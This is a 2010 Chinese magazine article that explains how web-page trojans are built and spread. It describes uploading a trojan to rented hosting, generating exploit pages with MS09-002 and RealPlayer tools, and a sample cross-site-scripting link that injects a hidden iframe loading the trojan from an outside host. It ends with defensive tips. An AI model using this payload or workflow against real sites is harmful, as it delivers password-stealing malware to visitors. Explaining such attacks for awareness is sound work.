木马变身记(下)——潜伏网页后 木马等你来

安全维护

特约作者 汪泓翰 · 2010年8月30日 第34期

除了寄生在正常文件体内,木马还有另外一项本领,藏身正常网页中,坐等用户自投罗网……

网页木马是大杀器

案例1 2009年上半年,以五月天集团、螃蟹集团为代表的五大挂马集团浮出水面,它们在网上发动了大规模的挂马攻击,严重威胁了网民的上网安全。

案例2 2010年6月,学生张×为了填报高考志愿,查询了很多高校,当他再一次登录某知名高校时,杀毒软件报毒,提示有木马企图进入他的电脑。

案例1中,2009年正是挂马网页井喷式增长的年份,有830多万个网站被挂马(数据来自金山),黑客集团作战的危害令人心惊胆战。案例2中,高校网站是挂马重灾区之一,今天网页没有网页木马不代表明天就没有。

一旦访问了挂马网页了,就会激活网页中的网页木马,它会偷偷潜入用户的电脑,伺机窃取用户的网游、QQ、股票等账号和密码——绝大多数网页木马都是盗号木马变过来的。那木马是怎么变成网页木马的?又是如何混入正常网页的呢?请接着往下看!

先要找个窝

黑客要炮制网页木马,首先得为木马在网上找一个窝,如果没有这个窝,木马就不能通过网页激活。那上哪里为木马找窝呢?有的黑客找的是国外的空间,但大多数是用国内的空间,例如http://www.3322.org的空间。

登录网站后,点击“注册”,进入注册页面(图1),按照提示完成注册——黑客注册时提供的都是虚假信息。购买空间后,上传木马到空间中,这样木马就得到一个下载地址,例如http:/cdx. 3322.org /1.exe。

34-g08-01.jpg
图1

就这样木马就变成网页木马了吗?不,操作还没有结束。它还需要一双翅膀,这双翅膀就是一个特殊的网页,有了这双翅膀它才是真正的网页木马。下面,我们解密黑客如何使用黑客工具制作这双翅膀。

长出翅膀来

工具名称:MS09-002网马生成器

工具特点:利用系统漏洞激活木马

特别提示:此类网页木马攻击人群广,但成功率不高

该工具利用微软的MS09-002漏洞(IE漏洞)制作网页木马,所有没有补上该漏洞的电脑都是网页木马的攻击目标,该工具是系统漏洞类网马生成器中的代表作。运行工具后,在“木马下载地址”处填写此前上传到空间的木马下载地址,再点击“生成”得到一个名为Muma的网页(图2)。

34-g08-02.jpg
图2

将Muma网页上传到空间,一个网页木马就诞生了。接下来,要考虑的是如何把木马塞入正常网页中,这就需要黑客找到网站的漏洞。如果黑客完全入侵了网站,就可以在后台上传网页木马,网站的地址就是网页木马传播的地址,用户根本看不出端倪,所以这种方法非常隐蔽——利用的条件也较高,越是大网站越不容易被攻破。

完全攻破网站,比较费时间,且大型网站不容易被攻破,怎么办?黑客还有另外的手段,那就是寻找跨站漏洞,构造挂马链接,例如http://blog.***.cn/newblog/noticepage.asp?msg=< iframe src="http:/cdx. 3322.org /Muma.html" width=0 height=0>。

通过QQ群、邮件、论坛等渠道将挂马链接传播出去,如果用户点击了该链接,就激活了网页木马。我们可以这样理解这个过程:网站是一个商场,跨站漏洞是商城中的盲区,这里保安和售货员都不管,于是黑客冒充商城的员工在盲区内摆摊,出售有毒商品,而消费者则将黑客误认为是商场的员工,即便上当也认为是被商场骗了。

该工具利用RealPlayer漏洞制作网页木马,攻击多种影音播放器,由于很多人禁止播放器自动升级或不更新播放器的版本,所以播放器类网页木马比系统漏洞类网页木马攻击成功率高。运行该工具后,在“木马下载地址”处填写http:/cdx. 3322.org /1.exe, 在“实现方式”处选择“脚本跳转”,“页面内容”处可以随意填写欺骗内容,例如对不起此页面未授权访问。

点击“生成”按钮出现一个激活木马的网页music.htm(图3)和激活木马的视频music.smi(.smi文件默认用RealPlaye打开),将music.htm上传到空间,将music.smi取一个好听的名字在网上发布出去,用户点击该视频就会运行music.htm,从而激活木马。这种方法的好处是不需要攻破网站,利用难度较小。

34-g08-03.jpg
图3br>

木马通过各种渠道进入电脑时,杀毒软件会报警,可有的木马却可以躲过杀毒软件的检测,它们是怎么骗过杀毒软件的?下期更加精彩,不容错过!

木马别进我家门

看完“木马变身记”,大家都知道木马的传播渠道了吧,那如何阻止网页木马、捆绑木马占领我们的电脑呢?有什么简单实用的方法吗?有的,以一套组合防御方法,可以有效地阻止木马入侵。

首先,要及时打上系统和常用程序的漏洞,没有漏洞就算碰到网页木马,也不会激活。其次,可以使用过滤挂马代码的浏览器,例如微软的IE 8,此类浏览器可以阻止网页木马激活,切断了挂马代码和网页木马的联系。不过,大多数网民习惯现有的浏览器,不愿意更换浏览器,那又怎么办呢?

这个时候,我们可以使用带网页木马拦截能力的安全辅助工具,例如360安全卫士、金山网盾、锐甲、瑞星卡卡等,它们在应对网页木马方面都有不俗的表现。上述工具无法检测捆绑木马,捆绑木马又该如何对付呢?

对付捆绑木马,最有效的方法是使用安全工具的“下载保护”功能、下载工具的下载后杀毒功能,它们都可以对下载的文件进行扫描,及时发现问题。如果文件来源不可靠,还可以上传到多引擎病毒扫描网站进行安全鉴定(http://www.virscan.org)。